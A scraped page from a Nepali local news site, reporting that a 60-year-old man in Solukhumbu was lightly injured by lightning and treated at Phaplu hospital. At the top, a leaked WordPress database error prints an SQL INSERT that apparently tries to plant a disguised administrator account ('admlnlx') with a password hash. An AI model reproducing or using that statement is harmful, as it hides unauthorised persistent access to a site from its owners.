WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE1gKsBuBu6raGQwLoGCXSAQVU57t//', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 05:36:44', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुमा चट्याङ लागेर एक जना घाईते – Gaule Khabar

सोलुखुम्बुमा चट्याङ लागेर एक जना घाईते

सोलुखुम्बुमा चट्याङ लागेर एक जना घाईते

गाउँले न्युज, सोलखुम्बु । सोलुखुम्बुको थुलुङदुधकोशी गाउँपालिका वडा नम्बर २ मा चट्याङ लागेर सोम बहादुर बस्नेत घाइते भएका छन् । स्थानिय ६० वर्षिया बस्नेत सामान्य घाइते भएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ ।

बस्नेतलाई शुक्रबार दिउसो साडे २ बजे चट्याङको झिल्का लागेको पारिवारिक श्रोतले जनाएको छ । घाईते बस्नेतको फाप्लु अस्पतालमा उपचार भइरहेको छ भने उहाँको अवस्था खतरामुक्त रहेको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जानकारी दिएको छ ।

साभार: सोलु एफ एम

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका